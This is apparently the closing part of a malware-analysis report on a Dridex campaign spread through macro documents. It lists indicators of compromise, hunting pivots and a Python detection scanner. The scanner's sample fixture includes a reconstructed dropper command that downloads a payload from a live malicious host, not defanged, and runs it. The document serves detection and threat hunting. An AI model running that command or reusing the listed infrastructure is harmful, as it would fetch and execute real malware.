smokesome[.]xyz
shameonyou[.]xyz
URLs
blueflag[.]xyz/nCvQOQHCBjZFfiJvyVGA/yrkbdmt.bin
shameonyou[.]xyz/wBNPADvPLRDHrvqjFnEV/hjjalma.bin
IPs
49[.]51.172.56:80 (initial payload download)
91.211.88[.]122:443 (post execution C2 | Dridex)
107.161.30[.]122:8443 (post execution C2| Dridex)
188.166.25[.]84:3886 (post execution C2| Dridex)
87.106.7[.]163:3886 (post execution C2| Dridex)
Directories
c:\DecemberLogs\*
Filenames
Caff54e1.exe
OliviaMatter.vbs
Restaraunt1.cmd
Restaraunt2.cmd
Restaraunt3.cmd
Restaraunt4.cmd
Related Samples (SHA1)
(Related by outbound network indicator: 49.51.172[.]56)
bef048ef2f1897c334b0d158b4c8cd7c40e7eb96 (deeppool[.]xyz)
eab4705f18ee91e5b868444108aeab5ab3c3d480 (deeppool[.]xyz)
(Related by Directory Creation “DecemberLogs”)
3e85ad7548cd175cf418ea6c5b84790849c97973 (lialer[.]com)
- (pDNS: 8.208.78[.]91)
fddc300433eabd0a5893f70679f05ad5e9af44f2 (smokingpot[.]xyz)
- (pDNS: 8.208.78[.]248)
cabc1ac7b00e7d29ca7d2b77ddd568b3ef1274da (macyranch[.]com)
- (pDNS: 47.90.206[.]16)
(Related by Chinese-simplified resource string table SHA256 Hash)
0585cabaf327a8d2c41bfb4882b8f0cd550883cd
d0d571ed6b3780a399caacc88d764ee63426e788 (dynamic)
----------------------------------------
d5f5508d82719d4b290b99adab72dd26af7c31fe
Host URL: hxxp://sulainul[.]com/esdfrtDERGTYuicvbnTYUv/gspqm.exe
Host URL: hxxp://hindold[.]com/esdfrtDERGTYuicvbnTYUv/gspqm.exe
Example Source Email (attachment: filename=”invoice_650014.xls”)
- From: “Constancia Jenelle” <alla.petrovna[@]client.civiltoolspro[.]com>
- Subject: Invoice Due No.
- Reply-To: justinareaves[@]theheartofok[.]com
----------------------------------------
37fe041467a245cdaf50ff2deb617c5097ab30b2
b5e97e1c8fca92aceb4f27b69d0252b5ffc25c03
2644dd2af154160f6ac1045e2d13c364e879a8f0
5b4cb9dcbf7b176e226c2f46a2970017d2fe2fab
d0bbd4c5ac4d368026160419e95f381f72a1b739 (dynamic)
Related Domains
Related by pDNS resolution history of 49[.]51.172.56:
asmarlife[.]com
lndeed[.]press
secure[.]lndeed[.]tech
root[.]lndeed[.]press
lndeed[.]tech
secure[.]lndeed[.]press
lsarta[.]ca
emplois[.]lsarta[.]ca
*[.]lsarta[.]ca
shameonyou[.]xyz
www[.]shameonyou[.]xyz
warmsun[.]xyz
mineminecraft[.]xyz
smokesome[.]xyz
deeppool[.]xyz
www[.]asmarlife[.]com
Related by pDNS resolution history of 8.208.78[.]91:
telakus[.]com
frogistik99[.]com
rilaer[.]com
lialer[.]com
*.frogistik99[.]com
lerlia[.]com
*.rilaer[.]com
*.lerlia[.]com
Certificate Common Names (CN)
1Parestheal[.]game — (Associated Infra: 91.211.88[.]122)
7Meconepear[.]Oofwororgupssd[.]tm — (Associated Infra: 91.211.88[.]122)
hanghatangth[.]bt — (Associated Infra: 91.211.88[.]122)
lonfly3thefsh[.]career — (Associated Infra: 91.211.88[.]122)
Mndr7tiran[.]Nghinbrigeme[.]nadex — (Associated Infra: 91.211.88[.]122)
thit[.]ademw[.]4Atewbanedebr[.]bid — (Associated Infra: 91.211.88[.]122)
Related by associated hash hosting URL domain (47.252.13[.]182):
paskelupins[.]online
www[.]paskelupins[.]online
hindold[.]com
sulainul[.]com
www[.]hindold[.]com
cloudmgrtracker[.]com
staitonfresk[.]site
*[.]staitonfresk[.]site
zxc[.]global
maramarket[.]site
www[.]staitonfresk[.]site
xn--cinbse-lua6k[.]com
blockachaln[.]com
sucuritester[.]com
animal-planet[.]site
astritbull[.]site
logln-blockchalne[.]com
www[.]operstik[.]site
operstik[.]site
v-gate[.]club
www[.]hpsupport[.]site
hpsupport[.]site
kossmoss[.]space
ssaite[.]site
www[.]kossmoss[.]space
Hunting Pivots
- “Restaraunt” typo within ole stream (macro)
- Impersonation of VDIME.DLL Citrix Receiver DLL
- VBA macro bin (SHA1): ebaab69446fbf4dcf7efbd232048eac53d3f09fb
- First stage downloader User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) (the default UA of the WinHttp.WinHttpRequest.5.1 COM object the dropped VBS uses; see http.log above)
- Directory Create: DecemberLogs
Metadata (source doc)
- Total Edit Time: 0
- Pages: 2
- Words: 2
- Characters: 18
- Heading Pairs: Title, 1, Название, 1
Hosting Infrastructure: hostfory (Ukraine) | 91.211.88[.]0/22
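As an added example (not the write-up's code, nor olevba's or oledump's), the scanner below turns the string pivots from the macro analysis and the Hunting Pivots list above (the "Restaraunt" typo, the DecemberLogs directory, WinHttp.WinHttpRequest.5.1, ADODB.Stream, the wscript //nologo invocation) into a check that runs over dumped stream or dropped-cmd text, and pulls out the URLs and drop paths it finds, defanged the way the IOC list is. SAMPLE_STREAM is constructed from the stream-26 and Restaraunt2.cmd lines quoted above (with the download URL written as it would appear in the dropped file, not defanged); CLEAN_STREAM is a constructed benign macro used as a negative control.

```python
"""Hunting-pivot scanner for dumped macro streams and dropped scripts (added example;
not the write-up's code and not olevba's or oledump's).  SAMPLE_STREAM is constructed
from the stream-26 / Restaraunt2.cmd lines quoted above, with the download URL written
the way it would appear in the dropped file rather than defanged; CLEAN_STREAM is a
constructed benign macro used as a negative control."""
import re

# Pivots taken from the analysis above: the misspelling, the drop directory, the COM
# objects the VBS downloader instantiates, and the wscript invocation that runs it.
PIVOTS = {
    "restaraunt-typo": re.compile(r"Restaraunt", re.I),
    "decemberlogs-dir": re.compile(r"\\DecemberLogs\\", re.I),
    "winhttprequest-com": re.compile(r"WinHttp\.WinHttpRequest\.5\.1", re.I),
    "adodb-stream": re.compile(r"ADODB\.Stream", re.I),
    "wscript-nologo": re.compile(r"\bwscript\s+//nologo\b", re.I),
}
URL_RE = re.compile(r"\b(?:hxxps?|https?)://[^\s\"']+", re.I)
DROP_RE = re.compile(r"[A-Za-z]:\\[^\s\"']+?\.(?:cmd|vbs|exe|bat|ps1|dll)\b", re.I)

SAMPLE_STREAM = r'''
bufferForCmd4 = "C:\DecemberLogs\Restaraunt4.cmd"
bufferForCmd1 = "C:\DecemberLogs\Restaraunt1.cmd"
bufferForCmd2 = "C:\DecemberLogs\Restaraunt2.cmd"
bufferForCmd3 = "C:\DecemberLogs\Restaraunt3.cmd"
set namerestaraunt=C:\DecemberLogs\OliviaMatter.vbs
Set MyVarname1 = Wscript.Arguments >> %namerestaraunt%
CreateObject("WinHttp.WinHttpRequest.5.1")
CreateObject("ADODB.Stream")
CreateObject("Scripting.FileSystemObject")
wscript //nologo c:\DecemberLogs\OliviaMatter.vbs http://blueflag.xyz/nCvQOQHCBjZFfiJvyVGA/yrkbdmt.bin C:\DecemberLogs\Caff54e1.exe
'''

CLEAN_STREAM = r'''
Sub AutoOpen()
    MsgBox "Quarterly totals updated"
End Sub
'''

def defang(url):
    """Write a URL the way the IOC list above does: http -> hxxp and dots in the host bracketed."""
    url = re.sub(r"^http", "hxxp", url, flags=re.I)
    scheme, _, rest = url.partition("://")
    host, slash, path = rest.partition("/")
    return f"{scheme}://{host.replace('.', '[.]')}{slash}{path}"

def scan(text):
    """Return the pivots that match, defanged URLs, dropped-file paths and a verdict."""
    pivots = sorted(name for name, rx in PIVOTS.items() if rx.search(text))
    urls = sorted({defang(u) for u in URL_RE.findall(text)})
    # dedupe paths that differ only in case (c:\ vs C:\), keeping the last spelling seen
    drops = sorted({d.lower(): d for d in DROP_RE.findall(text)}.values(), key=str.lower)
    # two independent pivots is a strong enough signal to pull the sample for review;
    # a single hit (say, the typo alone) is only a lead.
    return {"pivots": pivots, "urls": urls, "drops": drops,
            "verdict": "suspicious" if len(pivots) >= 2 else "clean"}

if __name__ == "__main__":
    for name, text in (("sample", SAMPLE_STREAM), ("clean", CLEAN_STREAM)):
        print(name, scan(text))
```

Feed scan() the text of a decompressed stream from oledump -s N -v or the contents of a recovered .cmd/.vbs, and the pivot names double as the strings you would carry into a YARA rule or a retro-hunt.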